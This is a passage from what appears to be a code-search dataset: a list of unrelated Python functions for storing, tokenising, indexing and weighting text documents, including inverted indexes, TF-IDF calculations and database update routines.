ValidationFailed(documents, message=\"Must be a list.\")\n\n new_documents = copy.deepcopy(documents)\n\n errors = cls.validate_and_deserialize_update(new_documents)\n if errors:\n raise ValidationFailed(documents, errors)\n\n try:\n if cls.logger.isEnabledFor(logging.DEBUG):\n cls.logger.debug(f\"Updating {new_documents}...\")\n previous_documents, updated_documents = cls._update_many(new_documents)\n if cls.logger.isEnabledFor(logging.DEBUG):\n cls.logger.debug(f\"Documents updated to {updated_documents}.\")\n return (\n [cls.serialize(document) for document in previous_documents],\n [cls.serialize(document) for document in updated_documents],\n )\n except pymongo.errors.DuplicateKeyError:\n raise ValidationFailed(\n [cls.serialize(document) for document in documents],\n message=\"One document already exists.\",\n )", "def load_documents(data_dir: str, docids: Set[str] = None) -> Dict[str, List[List[str]]]:\n if os.path.exists(os.path.join(data_dir, 'docs.jsonl')):\n assert not os.path.exists(os.path.join(data_dir, 'docs'))\n return load_documents_from_file(data_dir, docids)\n\n docs_dir = os.path.join(data_dir, 'docs')\n res = dict()\n if docids is None:\n docids = sorted(os.listdir(docs_dir))\n else:\n docids = sorted(set(str(d) for d in docids))\n for d in docids:\n with open(os.path.join(docs_dir, d), 'r') as inf:\n lines = [l.strip() for l in inf.readlines()]\n lines = list(filter(lambda x: bool(len(x)), lines))\n tokenized = [list(filter(lambda x: bool(len(x)), line.strip().split(' '))) for line in lines]\n res[d] = tokenized\n return res", "def load_documents_from_file(data_dir: str, docids: Set[str] = None) -> Dict[str, List[List[str]]]:\n docs_file = os.path.join(data_dir, 'docs.jsonl')\n documents = load_jsonl(docs_file)\n documents = {doc['docid']: doc['document'] for doc in documents}\n res = dict()\n if docids is None:\n docids = sorted(list(documents.keys()))\n else:\n docids = sorted(set(str(d) for d in docids))\n for d in docids:\n lines = documents[d].split('\\n')\n tokenized = [line.strip().split(' ') for line in lines]\n res[d] = tokenized\n return res", "def initialize_terms_and_postings():\n global dictionary, postings\n for id in document_filenames:\n document = getDocumentContent(document_filenames[id])\n if(document_filenames[id].rfind(\".pdf\") == len(document_filenames[id]) - 4):\n terms = tokenize(document.encode('utf-8'))\n if(document_filenames[id].rfind(\".txt\") == len(document_filenames[id]) - 4):\n terms = tokenize(document)\n if(document_filenames[id].rfind(\".docx\") == len(document_filenames[id]) - 5):\n terms = tokenize(document)\n if(document_filenames[id].rfind(\".pptx\") == len(document_filenames[id]) - 5):\n terms = tokenize(document)\n unique_terms = set(terms)\n dictionary = dictionary.union(unique_terms)\n for term in unique_terms:\n postings[term][id] = terms.count(term) # the value is the\n # frequency of the\n # term in the\n # document", "def _create_dictionary(self, document_set):\n words = self._normalize_words(document_set.words)\n unique_words = frozenset(words)\n return dict((word, idx) for idx, word in enumerate(unique_words))", "def set_keyword_map(self):\n \n ret = defaultdict(list)\n for idx, doc in enumerate(self.docs):\n for token in doc:\n if token in self.dictionary.token2id:\n ret[token].append(idx)\n \n self.keyword_map = ret\n return ret", "def clean_docs(self,docs):\n\n # Remove numbers, but not words that contain numbers.\n docs = [[token for token in doc if not token.isnumeric()] for doc in docs]\n\n # Remove words that are only one character.\n docs = [[token for token in doc if len(token) > 1 and token not in stop_words] for doc in docs]\n\n # lemmatizer = WordNetLemmatizer()\n # docs = [[lemmatizer.lemmatize(token) for token in doc] for doc in docs]\n\n # Add bigrams and trigrams to docs (only ones that appear 20 times or more).\n bigram = Phrases(docs, min_count=20)\n for idx in range(len(docs)):\n for token in bigram[docs[idx]]:\n if '_' in token:\n # Token is a bigram, add to document.\n docs[idx].append(token)\n\n # Create a dictionary representation of the documents.\n dictionary = Dictionary(docs)\n\n # Filter out words that occur less than 20 documents, or more than 50% of the documents.\n dictionary.filter_extremes(no_below=20, no_above=0.5)\n\n # Bag-of-words representation of the documents.\n corpus = [dictionary.doc2bow(doc) for doc in docs]\n\n return docs,dictionary,corpus", "def add_new_doc(self, document, documents_list_length=10000):\n\n try:\n document_dictionary = document.term_doc_dictionary\n # self.countDoc += 1\n for term in document_dictionary.keys():\n if self.stemming == 'y':\n my_stemmer = Stemmer()\n term = my_stemmer.stem_term(term)\n # Update inverted index and posting\n if term not in self.inverted_idx.keys():\n self.inverted_idx[term] = [1, [\n (document_dictionary[term], document.tweet_id)]] # amount of doc, freq in the doc, doc id.\n\n else:\n self.inverted_idx[term][0] += 1 # amount of doc\n self.inverted_idx[term][1].append((document_dictionary[term],\n document.tweet_id)) # freq in the doc # doc id\n\n if term not in self.postingDict.keys():\n self.postingDict[term] = [(document.tweet_id, document_dictionary[term])]\n else:\n self.postingDict[term].append((document.tweet_id, document_dictionary[term]))\n # self.countTweet -= 1\n\n if document.tweet_id not in self.tweet_dict.keys():\n self.tweet_dict[document.tweet_id] = [[term, document_dictionary[term]], 1,\n 0] # [term,freq in tweet], amount of unique terms in tweet, amount of terms in tweet\n elif document_dictionary[term] > self.tweet_dict[document.tweet_id][0][\n 1]: # tweet exist, compering between freq in two terms\n if self.tweet_dict[document.tweet_id][0][\n 1] == 1: # before change term check if the last term is unique\n self.tweet_dict[document.tweet_id][\n 1] += 1 # last term is unique: add to the amount of uniqe terms in tweet\n self.tweet_dict[document.tweet_id][0] = [term,\n document_dictionary[term]] # change between the terms\n self.tweet_dict[document.tweet_id][2] += 1\n elif document_dictionary[term] == 1: # tweet exist, not most common, check if unique\n self.tweet_dict[document.tweet_id][1] += 1\n self.tweet_dict[document.tweet_id][2] += 1\n except:\n # print('problem in indexer : add_new_doc')\n # print(traceback.print_exc())\n pass", "def add(self, document):\n #words=[word.lower() for word in words if word.isalpha()] #added on 0415\n for token in [t.lower() for t in nltk.word_tokenize(document)]:\n if not token.isalpha():\n continue\n\n if token in self.stopwords:\n continue\n \n if self.stemmer:\n token = self.stemmer.stem(token)\n \n if self.__unique_id not in self.index[token]:\n self.index[token].append(self.__unique_id)\n \n self.documents[self.__unique_id] = document\n self.__unique_id += 1", "def preprocess(self, documents):\n\n # Store the total number of documents\n num_docs = np.float(len(documents))\n\n # A dict storing the frequency of each word across all documents\n total_word_freq = {}\n\n # A dict storing the number of documents that word appears in\n doc_word_freq = {}\n\n # Iterate over all documents\n for doc in documents:\n # Split the string into a list of words\n words = extract_words(doc)\n\n # Update the 'total_word_freq' dict using all words in 'words'\n for w in words:\n ''' YOUR CODE HERE '''\n if w not in total_word_freq.keys():\n total_word_freq[w] = 1\n else:\n total_word_freq[w] += 1\n\n ''' END CODE FOR THIS LOOP '''\n\n # Update the 'doc_word_freq' dict. Remember to only add '1' corresponding to\n # each word in a document. In case a word appears twice in a document, then\n # it should be ignored. We use the set() data structure to achieve this.\n for w in set(words):\n ''' YOUR CODE HERE '''\n if w not in doc_word_freq:\n doc_word_freq[w] = 1\n else:\n doc_word_freq[w] += 1\n\n ''' END CODE FOR THIS LOOP '''\n\n # A set of words with total frequency less than 'self.min_freq'\n remove_words = set()\n\n ''' YOUR CODE HERE '''\n\n # Check frequency of each word and add to 'remove_words'\n for w in total_word_freq.keys():\n if total_word_freq[w] < self.min_freq:\n remove_words.add(w)\n\n # Delete the words in 'remove_words' from 'total_word_freq' and\n # 'doc_word_freq'.\n for w in remove_words:\n del total_word_freq[w]\n del doc_word_freq[w]\n\n # Create a numpy array to store frequencies from which\n # we can create the 'self.idf' preprocessed numpy array.\n word_freq_tensor = np.zeros(len(doc_word_freq))\n\n # For each word in 'doc_word_freq' dict, update\n # 'self.word_to_idx' and 'self.idx_to_word' and\n # 'word_freq_tensor'.\n i = 0\n for w in doc_word_freq.keys():\n self.word_to_idx[w] = i \n self.idx_to_word[i] = w\n word_freq_tensor[i] = doc_word_freq[w]\n i+=1\n \n #print(word_freq_tensor.shape)\n #print(word_freq_tensor)\n # Calculate 'self.idf' (see hint.pdf for formula)\n self.idf = -1*np.log(word_freq_tensor/(len(documents)))\n ''' END YOUR CODE HERE '''", "def process_new_tokens(tokens,processed_tokens_set, model, dictionary):\n if hasattr(model, 'using_pretrained') and model.using_pretrained is not None:\n processed_tokens_set.update(tokens)\n update_embedding_layer(processed_tokens_set, model, dictionary)", "def process_document(text):\n words = preprocess(text)\n postings = {}\n for word, ix in words:\n if word in postings:\n wordinfo = postings[word]\n else:\n wordinfo = {\"frequency\": 0, \"indexes\": []}\n postings[word] = wordinfo\n wordinfo[\"frequency\"] += 1\n wordinfo[\"indexes\"].append(ix)\n return postings", "def pre_process(self, documents):\n\n return documents", "def insert_many(self, documents: Iterable[dict]) -> None:\n for i, document in enumerate(documents):\n if isinstance(document, dict):\n self._store_document(document)\n else:\n raise TypeError(\n f\"The document at index {i} was not a dictionary. All documents must be dictionaries.\"\n )\n self._dump()", "def _docMapping(self):\n doc2quests = defaultdict(list)\n for q, d in self.quest2doc.items():\n doc2quests[d].append(q)\n return doc2quests", "def create_document_dictionary(documents):\n \n document_dictionary = dict()\n for document in documents:\n document_dictionary[document.cord_uid] = document\n return document_dictionary", "def transform4Doc2Vec(docs):\n\n # transform documents to be used by doc2Vec\n documents = []\n analyzedDocument = namedtuple('AnalyzedDocument', 'words tags')\n for i, doc in enumerate(docs):\n # use first line if documents are not tokenized, otherwise next line\n # words = text.lower().split()\n tags = [i]\n documents.append(analyzedDocument(doc, tags))\n\n return documents", "def _create_dictionary(self, document):\n words = self._normalize_words(document.words)\n unique_words = frozenset(words)\n return dict((word, idx) for idx, word in enumerate(unique_words))", "def enrich(self, lazy_corpus_loader, fileids=None):\n tag_dict = self.tag_dict\n word_tag_dict = self.word_tag_dict\n for word_tag in lazy_corpus_loader.tagged_words(fileids=fileids):\n word = word_tag[0]\n tag = word_tag[1]\n if not tag_dict.get(tag, None):\n raise KeyError, \"Unknown pos-tag: %s\" % tag\n tag_dict = word_tag_dict.get(word, {})\n tag_dict[tag] = tag_dict.get(tag, 0) + 1\n word_tag_dict[word] = tag_dict\n self.word_tag_dict = word_tag_dict", "def add(self, tokens):\n\n for token in tokens:\n self.vocab.add(token)\n\n for leader, token in generate_ngrams(tokens, self.size, include_terminator = self.size != 1):\n if leader not in self.frequencies:\n self.frequencies[leader] = Frequency()\n\n self.frequencies[leader].add(token)", "def set_doc_phrases(doc_phrases, docs, phrases):\n for doc in docs:\n if not doc in doc_phrases:\n doc_phrases[doc] = []\n doc_phrases[doc] = doc_phrases[doc] + phrases", "def tokenize_document(doc_info: dict, tokenizer: BertTokenizer, max_doc_length: int = None) -> dict:\n sub_tokens: List[str] = [] # all sub tokens of a document\n sentence_map: List[int] = [] # collected tokenized tokens -> sentence id\n subtoken_map: List[int] = [] # collected tokenized tokens -> original token id\n\n word_idx = -1\n\n for sentence_id, sentence in enumerate(doc_info['sentences']):\n for token in sentence:\n word_idx += 1\n word_tokens = tokenizer.tokenize(token)\n sub_tokens.extend(word_tokens)\n sentence_map.extend([sentence_id] * len(word_tokens))\n subtoken_map.extend([word_idx] * len(word_tokens))\n if max_doc_length:\n num_to_pad = max_doc_length - len(sub_tokens)\n sub_tokens.extend([\"[PAD]\"] * num_to_pad)\n sentence_map.extend([sentence_map[-1]+1] * num_to_pad)\n subtoken_map.extend(list(range(word_idx+1, num_to_pad+1+word_idx)))\n # global MAX_LENGTH\n # if len(sub_tokens) > MAX_LENGTH:\n # print(len(sub_tokens))\n # MAX_LENGTH = len(sub_tokens)\n # print(MAX_LENGTH)\n # todo(yuxian): need pad speakers?\n speakers = {subtoken_map.index(word_index): tokenizer.tokenize(speaker)\n for word_index, speaker in doc_info['speakers']}\n clusters = [[(subtoken_map.index(start), len(subtoken_map) - 1 - subtoken_map[::-1].index(end))\n for start, end in cluster] for cluster in doc_info['clusters']]\n tokenized_document = {'sub_tokens': sub_tokens, 'sentence_map': sentence_map, 'subtoken_map': subtoken_map,\n 'speakers': speakers, 'clusters': clusters, 'doc_key': doc_info['doc_key']}\n return tokenized_document", "def replace_words_fun(self):\n\n cleaned_doc = []\n for word in str(self.doc).split():\n if word.lower() in self.replacement_list.keys():\n cleaned_doc.append(self.replacement_list[word.lower()])\n else:\n cleaned_doc.append(word)\n self.doc = ' '.join(cleaned_doc)", "def get_idf_dict(clean_corpus, tf_list, num_docs):\n \n idf_dict = {}\n for i in range(num_docs):\n for key in tf_list[i].keys():\n if key not in idf_dict.keys():\n idf_dict[key] = 0\n idf_dict[key] = idf_dict[key] + 1\n \n for key in idf_dict.keys():\n idf_dict[key] = math.log2(num_docs/idf_dict[key])\n # idf_dict's keys -> all unique tokens in the corpus \n return idf_dict", "def initialize_document_frequencies():\n global document_frequency\n for term in dictionary:\n document_frequency[term] = len(postings[term])", "def preprocess_corpus(corpus, stop_list, stop_words=True, stemm=True, bag_words=True):\n corpus_preprocessed = list()\n for element in corpus:\n new_element = dict()\n new_element['document'] = preprocess_document(element['text'], stop_list, stop_words, stemm, bag_words)\n new_element['id'] = element['id']\n corpus_preprocessed.append(new_element)\n\n return corpus_preprocessed", "def create_tokens_li():\n cnt=0\n for file in docs:\n file_name = open(\"./corpus/\"+ str(file) + \".txt\")\n print(cnt)\n cnt+=1\n words = file_name.read()\n tokens_doc = nltk.word_tokenize(words)\n tokens_doc = [w.lower() for w in tokens_doc]\n #tokens_doc = [snowball_stemmer.stem(token) for token in tokens_doc]\n tokens_doc = [token for token in tokens_doc if token not in nltk.corpus.stopwords.words('english')]\n tokens_li.append(tokens_doc)\n\n\n #storing in json file\n with open('savers/tokens.json', 'w') as fp:\n json.dump(tokens_li, fp)", "def documents(self, documents):\n\n self._documents = documents", "def documents_to_dict(documents: List[Dict]) -> Dict[str, Dict]:\n res = {}\n for doc in documents:\n res[doc['id']] = doc\n return res", "def map_docs(docs_file):\n word_map = defaultdict(int)\n doc_count = 0\n token_count = 0\n\n for _, doc_tokens in tokenize(docs_file):\n doc_count += 1 # count document\n token_count += len(doc_tokens) # count tokens\n for token in set(doc_tokens):\n word_map[token] += 1 # increase inverted index count\n\n docs_file.seek(0) # reset file pointer\n return doc_count, token_count, word_map", "def updateScores(rankedLists):\n docToRank = {}\n for rankedList in rankedLists:\n\n f = open(rankedList, 'r')\n for line in f:\n documentID = line.split()[2]\n docno = documentID\n score = float(line.split()[4])\n position = int(line.split()[3])\n docToRank[docno] = (position,score)\n f.close()\n client = MongoClient('asr2.iem.technion.ac.il',27017)\n db = client.asr16\n documents = db.documents.find({})\n for document in documents:\n key = document[\"query_id\"]+\"-\"+document[\"username\"]\n document['position'] = docToRank[key][0]\n document['score'] = docToRank[key][1]\n document['posted_document'] = document['current_document']\n db.documents.save(document)", "def merge_docs(self):", "def run(self, mapping={}, *args, **kwargs):\n self.processed = 0\n for batch in self._process_by_batch(self.load(*args, **kwargs)):\n batch = list(map(lambda doc: self._apply_mapping(doc, mapping), batch))\n for doc in batch:\n self._ingest(iterable=doc, doctype=doc[\"doctype\"])\n self.processed += 1\n logger.info(\"Added {} documents to the database.\".format(self.processed))", "def make_vocab_from_docs(docs):\n vocab_words=set()\n for doc in docs:\n doc=doc.lower()\n doc=re.sub(r'-',' ',doc)\n doc=re.sub(r' +',' ',doc) # turn multiple spaces into a single space\n doc=re.sub(r'[^a-z ]','',doc) # remove anything that is not a-z or space\n words=set(doc.split())\n vocab_words=vocab_words.union(words)\n vocab=dict(zip(vocab_words,range(len(vocab_words))))\n return vocab", "def _prepare_analysis_input(self, documents):\n subdoc_to_doc_map = {}\n wordtype_to_number = {}\n number_to_wordtype = []\n wordtypes = {}\n \n # prevent duplicating work\n if os.path.exists(self.wordtype_file):\n return\n \n try:\n # First find singletons\n if self.remove_singletons:\n word_type_count_threshold = max(1, int(math.log(documents.count(), 10)) - 2)\n temp_word_type_counts = {}\n for doc_index, doc in enumerate(documents):\n tokens = self.tokenize(doc.get_content())\n for token, token_start in tokens:\n temp_word_type_counts[token] = temp_word_type_counts.setdefault(token, 0) + 1\n for word_type, count in temp_word_type_counts.iteritems(): # add singletons to stopword list\n if count <= word_type_count_threshold:\n self._excluded_words[word_type] = True\n with io.open(self.excluded_words_file, 'w', encoding='utf-8') as ex_f:\n ex_f.write(unicode(json.dumps(self._excluded_words)))\n \n haltwords = dict(self.stopwords)\n haltwords.update(self._excluded_words)\n # Second find bigrams, iterate through documents and train.\n if self.find_bigrams:\n from import_tool.analysis.bigram_finder import BigramFinder\n bigram_finder = BigramFinder(stopwords=haltwords)\n for doc_index, doc in enumerate(documents):\n bigram_finder.train(doc_index, self.tokenize(doc.get_content()))\n bigram_finder.print()\n \n # Third, we're going to stem words\n if self.stem_words:\n from import_tool.analysis.stemmer import Stemmer\n stemmer = Stemmer(self._working_dir, self.base_dir)\n \n # for each document tokenize and map tokens to numbers to avoid regex problems before passing data to Mallet\n with io.open(self.mallet_input_file, 'w', encoding='utf-8') as w:\n with io.open(self.start_index_file, 'w', encoding='utf-8') as w2:\n count = 0\n subcount = 0\n for doc_index, doc in enumerate(documents):\n doc_content = unicode(doc.get_content())\n count += 1\n subdocuments = self.create_subdocuments(doc_index, doc_content)\n token_start_index_offset = 0 # needed to make sure the start index remains correct once the document is re-merged\n for subdoc_name, subdoc_content in subdocuments:\n if subcount > 0:\n w2.write(u'\\n')\n subcount += 1\n subdoc_to_doc_map[subdoc_name] = doc_index\n tokens = self.tokenize(subdoc_content)\n \n if self.find_bigrams:\n tokens = bigram_finder.combine(tokens, subdoc_content)\n \n token_numbers = []\n token_start_indices = []\n only_tokens = []\n tokens_temp = []\n for tok, tok_start in tokens:\n only_tokens.append(tok)\n tokens_temp.append([tok, tok_start + token_start_index_offset])\n tokens = tokens_temp\n tokens_temp = None\n if self.stem_words:\n stemmed_tokens = stemmer.stem(only_tokens)\n else:\n stemmed_tokens = only_tokens\n for tup, tok_stem in zip(tokens, stemmed_tokens):\n tok, tok_start = tup\n wordtypes[tok] = True\n wordtypes[tok_stem] = True\n try:\n tok_num = wordtype_to_number[tok_stem]\n except:\n tok_num = len(wordtype_to_number)\n number_to_wordtype.append(tok_stem)\n wordtype_to_number[tok_stem] = tok_num\n token_numbers.append(unicode(tok_num))\n token_start_indices.append([tok, tok_start])\n text = u' '.join(token_numbers)\n w.write(u'{0} all {1}\\n'.format(subdoc_name, text))\n w2.write(unicode(json.dumps(token_start_indices)))\n token_start_index_offset += len(subdoc_content)\n for tok, tok_start in tokens:\n try:\n assert doc_content[tok_start:tok_start+len(tok)].lower() == tok.lower()\n except:\n print(tok_start)\n print(len(tok))\n print('\"'+doc_content[tok_start:tok_start+len(tok)].lower()+'\"')\n print('\"'+tok.lower()+'\"')\n raise\n if not count:\n raise Exception('No files processed.')\n # record which subdocuments belong to which documents\n with io.open(self.subdoc_to_doc_map_file, 'w', encoding='utf-8') as w:\n w.write(unicode(json.dumps(subdoc_to_doc_map)))\n with io.open(self.wordtype_to_number_file, 'w', encoding='utf-8') as w:\n w.write(unicode(json.dumps(wordtype_to_number)))\n with io.open(self.number_to_wordtype_file, 'w', encoding='utf-8') as w:\n w.write(unicode(json.dumps(number_to_wordtype)))\n with io.open(self.wordtype_file, 'w', encoding='utf-8') as w:\n w.write(unicode(json.dumps(wordtypes)))\n except: # cleanup\n self._cleanup(self.mallet_input_file)\n self._cleanup(self.subdoc_to_doc_map_file)\n self._cleanup(self.wordtype_to_number_file)\n self._cleanup(self.number_to_wordtype_file)\n self._cleanup(self.wordtype_file)\n self._cleanup(self.excluded_words_file)\n raise", "def current_word_PL(current_word, file_reader_last_read_list, doc_dict, nb_doc):\n word_posting_list = {} # { key = doc , value = score }\n for idx, file_reader_last_read in enumerate(file_reader_last_read_list):\n if file_reader_last_read[\"last_read\"][\"word\"] == current_word:\n docs = file_reader_last_read[\"last_read\"][\"doc_score_list\"]\n add_doc_in_posting_list(word_posting_list=word_posting_list, docs=docs)\n file_reader_last_read_list[idx]=read_line_and_update(file_reader_and_last_read=file_reader_last_read)\n for key, value in word_posting_list.items():\n tf = float(value) / doc_dict[int(key)]\n idf = math.log((float(nb_doc)/len(word_posting_list)),2)\n score = tf*idf\n word_posting_list[key]=score \n word_posting_list = sort_and_cast_doc_in_posting_list(word_posting_list=word_posting_list)\n return word_posting_list", "async def put_documents(self, collection, documents):\n await self.ensure_collection(collection)\n try:\n if SOLR_COMMIT_WITHIN:\n params = {'commitWithin': SOLR_COMMIT_WITHIN}\n else:\n params = {'commit': 'true'}\n await self.post(\n '/v2/collections/{}/update'.format(collection),\n params=params, json_data=documents\n )\n logger.info('Successfully indexed {} documents to collection {}'\n .format(len(documents), collection))\n except SolrError:\n logger.warning('Failed to put {} documents to collection {}'\n .format(len(documents), collection))\n raise", "def from_documents(cls, documents):\n # return cls.from_words(_itertools.chain(*documents))\n return cls.from_words(\n cls._build_new_documents(documents, cls.default_ws, pad_right=True)\n )", "def add_new_doc(self, document, end_of_corpus):\n max_tf = 0\n unique_terms_counter = 0\n document_dictionary = document.term_doc_dictionary\n # Go over each term in the doc\n for term in document_dictionary:\n try:\n # Update inverted index and posting\n if term not in self.inverted_idx:\n self.inverted_idx[term] = 1\n unique_terms_counter += 1\n else:\n self.inverted_idx[term] += 1\n if term not in self.posting_dict:\n self.posting_dict[term] = []\n\n self.posting_dict[term].append(\n (document.tweet_id, document_dictionary[term])) # key: str , value: array of tuples\n\n max_tf = max(document_dictionary[term], max_tf)\n\n except:\n\n print('problem with the following key {}'.format(term[0]))\n\n document.max_tf = max_tf\n document.unique_terms = unique_terms_counter\n self.docs_count += 1\n\n modulo = int(document.tweet_id) % 10\n self.documents[modulo][document.tweet_id] = [document.term_doc_dictionary, document.max_tf]\n\n if self.docs_count == self.DOCS_SIZE or end_of_corpus: # if we reach chunk size or end of corpus\n self.add_to_file(end_of_corpus)\n self.docs_count = 0\n self.posting_dict = {}\n\n for i in self.documents: # 0 - 9\n if self.documents[i].__len__() > 15000:\n doc = utils.load_obj(self.out + \"document\" + str(i))\n doc.update(self.documents[i])\n utils.save_obj(doc, self.out + \"document\" + str(i))\n self.documents[i] = {}", "def upload(self, documents: List[Document], vectorise_func) -> None:\n\n # Add doc_store to documents\n for d in documents:\n d.doc_store = self\n # Check ID uniqueness\n check_duplicate_documents(documents)\n # Check type consistency\n check_document_types(documents)\n # Batching\n batches = batch_items(documents)\n\n # Update document class conveniently\n if issubclass(type(documents[0]), ChunkedDocument):\n self._doc_class = ChunkedDocument\n\n for batch in batches:\n vectorise_func(batch, self)\n self.documents += batch", "def add_doc(self, document):\n # Split document up into list of strings\n #words = self.tokenize(document)\n words = document\n # Count word frequencies in this document\n word_counts = {}\n for word in words:\n word_counts[word] = word_counts.get(word, 0) + 1\n # Add word counts as new row to sparse matrix\n self.sparse.append(word_counts)\n # Add to total document count for each word\n for word in word_counts:\n self.doc_count[word] = self.doc_count.get(word, 0) + 1", "def _merge_conllu_subtokens(self, lines: List[str], doc: Doc)-> Doc:\n # identify and process all subtoken spans to prepare attrs for merging\n subtok_spans = []\n for line in lines:\n parts = line.split(\"\\t\")\n id_, word, lemma, pos, tag, morph, head, dep, _1, misc = parts\n if \"-\" in id_:\n subtok_start, subtok_end = id_.split(\"-\")\n subtok_span = doc[int(subtok_start) - 1 : int(subtok_end)]\n subtok_spans.append(subtok_span)\n # create merged tag, morph, and lemma values\n tags = []\n morphs = {}\n lemmas = []\n for token in subtok_span:\n tags.append(token.tag_)\n lemmas.append(token.lemma_)\n if token._.merged_morph:\n for feature in token._.merged_morph.split(\"|\"):\n field, values = feature.split(\"=\", 1)\n if field not in morphs:\n morphs[field] = set()\n for value in values.split(\",\"):\n morphs[field].add(value)\n # create merged features for each morph field\n for field, values in morphs.items():\n morphs[field] = field + \"=\" + \",\".join(sorted(values))\n # set the same attrs on all subtok tokens so that whatever head the\n # retokenizer chooses, the final attrs are available on that token\n for token in subtok_span:\n token._.merged_orth = token.orth_\n token._.merged_lemma = \" \".join(lemmas)\n token.tag_ = \"_\".join(tags)\n token._.merged_morph = \"|\".join(sorted(morphs.values()))\n token._.merged_spaceafter = (\n True if subtok_span[-1].whitespace_ else False\n )\n\n with doc.retokenize() as retokenizer:\n for span in subtok_spans:\n retokenizer.merge(span)\n\n return doc", "def _apply_mapping(self, document, mapping):\n if not mapping:\n return document\n new_document = {v: document[k] for k, v in mapping.items() if k in document}\n # Keep track of missing keys\n self.missing_keys.update([k for k in mapping if k not in document])\n\n # Document errors for missing documents\n if not new_document:\n self.failed += 1\n self.failed_ids.append(\n document.get(\"id\", document.get(\"ID\", document.get(\"_id\", None)))\n )\n return new_document", "def count_doc_frequencies(self, docs):\n frequencyIndex = {}\n doc_id = 0\n for doc in docs:\n for term in doc:\n if term not in frequencyIndex:\n frequencyIndex[term] = [doc_id]\n else:\n for id in frequencyIndex[term]:\n if doc_id == id:\n break\n else:\n frequencyIndex[term].append(doc_id)\n doc_id+=1\n\n for term in frequencyIndex:\n occurences = len(frequencyIndex[term])\n frequencyIndex[term] = occurences\n\n return frequencyIndex", "def set_documents(cls, input_list_text: List[str]) -> None:\n cls.documents = input_list_text", "def featurize(movies):\n ###TODO \n movies['features'] = \"\" \n get_h = set() \n vocab_dict = {}\n df_dict_return = {}\n tup_list = []\n index_dict = {}\n index_dict_1 = {}\n movie_len = len(movies) \n #print(\"MovieLength::\",movie_len)\n #print(\"MOVIES:::\",movies)\n \n get_h = cal_unique_features(movies) # num_features\n\n vocab_dict = cal_unique_vocab(get_h) # vocab complete\n\n len_vocab = len(get_h)\n \n df_dict_return = cal_unique_docs(get_h,movies) # df(i)\n\n for token in get_h :\n #tup_list.clear()\n #print(\"token_GOTTTTT:::\",token)\n for index,row in movies.iterrows(): \n #print(\"row_got::\",row)\n gen_list = row['tokens']\n #print(\"gen_list::\",gen_list)\n #mov_id = row['movieId'] \n #print(\"mov_id::\",mov_id)\n token_count_1 = Counter(gen_list).most_common()[:1]\n tok = token_count_1[0]\n index_dict_1[index] = tok[1]\n token_count = gen_list.count(token)\n #print(\"token_count::\",token_count)\n tup = (index,token_count)\n #print(\"tuple::\",tup)\n tup_list.append(tup)\n #print(\"LIST_PRINT:::::::::::::\",tup_list)\n index_dict[token] = tup_list\n tup_list = []\n \n \n #print(\"INDEX_DICT:::\",index_dict) # tf(i,d)\n #print(\"INDEX_DICT_1:::\",index_dict_1) # max_k dict per docx\n \n \n for ind, row in movies.iterrows():\n data_list = []\n rows_list = []\n columns_list = []\n gen_list = row['tokens']\n #print(\"TOKENS GOTTT::\",gen_list) \n for gen in gen_list:\n tf = get_tf_value(index_dict,gen,ind)\n #print(\"TF GOTTT::\",tf) \n tf_weight = float( tf / index_dict_1[ind])\n #print(\"tf_weight::\",tf_weight)\n df_weight = float( math.log10( movie_len / df_dict_return[gen] ) )\n #print(\"df_weight::\",df_weight)\n final_tfidf = tf_weight * df_weight\n #print(\"final_tfidf::\",final_tfidf)\n data_list.append(final_tfidf)\n columns_list.append(vocab_dict[gen])\n rows_list.append(0) \n csr = csr_matrix((data_list, (rows_list,columns_list)), shape=(1,len_vocab))\n #print(\"TYPE of CSR GOTT::\",type(csr))\n #print(\"CSR GOTT:::\",csr) \n movies.set_value(ind, 'features', csr)\n \n #print(\"UPDATE movies::\",movies) \n\n return(movies,vocab_dict)\n \n\n pass", "def index_terms(self):\n [[self.set_postings(term, id) for term in NLProcessor.process(doc)] for id, doc in\n self.doc_store.dict.iteritems()]", "def updateWordCounts():\n emaildata = loadEmailData()\n englishwords = importDictionary()\n countAllWords(emaildata, englishwords)", "def set_document_numbers(notices):\n\n if len(notices) > 1:\n for notice in notices:\n notice['document_number'] = split_doc_num(\n notice['document_number'], notice['effective_on'])\n return notices", "def set_document_numbers(notices):\n\n if len(notices) > 1:\n for notice in notices:\n notice['document_number'] = split_doc_num(\n notice['document_number'], notice['effective_on'])\n return notices", "def update(self, docs: DocumentArray, *args, **kwargs):\n cursor = self.connection.cursor()\n psycopg2.extras.execute_batch(\n cursor,\n f'UPDATE {self.table} SET DOC = %s WHERE ID = %s',\n [\n (\n doc.SerializeToString(),\n doc.id,\n )\n for doc in docs\n ],\n )\n self.connection.commit()", "def updateWordList(emailids):\n with open('res/dictionary.txt', 'r') as f:\n lines = f.readlines()\n words = set([line.strip() for line in lines])\n\n with open('res/dictionary.txt', 'a') as f:\n for emailid in emailids: \n email = e.Email(emailid)\n subject = set(email.parsedsubject)\n body = set(email.body)\n try:\n emailcontent = body.union(subject)\n for word in emailcontent:\n if not word in words:\n words.add(word)\n f.write(word + '\\n')\n except AttributeError:\n print(body)", "def add_documents(self, docs):\n for doc in docs:\n assert isinstance(doc, pylastica.document.Document), \"All items in list docs must be of type Document: %r\" % doc\n doc.doc_type = self.name\n return self.index.add_documents(docs)", "def update_documents(self, engine_name, documents):\n endpoint = \"engines/{}/documents\".format(engine_name)\n data = json.dumps(documents)\n\n return self.swiftype_session.request('patch', endpoint, data=data)", "def create_freq_dict(corpus, doc_info):\n for idx, content in enumerate(corpus):\n word_freq_table = {}\n splitted_sentence = content.split()\n for word in splitted_sentence:\n word = word.lower()\n if word not in word_freq_table:\n word_freq_table[word] = 1\n else:\n word_freq_table[word] += 1\n doc_info[idx]['freq_dict'] = word_freq_table", "def index_feats_dict(self):\n doc_features_dict = {}\n\n for index, doc in zip(self.index, self.series):\n # Sets for a doc and feature words\n doc_set = set(doc.split())\n feat_set = set(self.features)\n\n # Shared words between the two sets\n interset_words = doc_set.intersection(feat_set)\n\n # Append to doc_features_dict\n doc_features_dict[index] = list(interset_words)\n\n return doc_features_dict", "def pos():\n pos_list = []\n for token in doc:\n pos_list.append(token.pos_)\n setList = list(set(pos_list))\n my_dict = {i: pos_list.count(i) for i in setList}\n print(my_dict)", "def finish_documents():\n\n doc_ids = json.loads(request.form['doc_ids'])\n\n for docid in doc_ids:\n\n document = Document.query.filter_by(id=docid).first_or_404()\n\n document.status = \"OK\"\n\n db.session.add(document)\n\n db.session.commit()", "def test_update_list(self):\n u = stellr.UpdateCommand(TEST_HTTP)\n docs = [{'a': 1}, {'b': 2}]\n u.add_documents(docs)\n 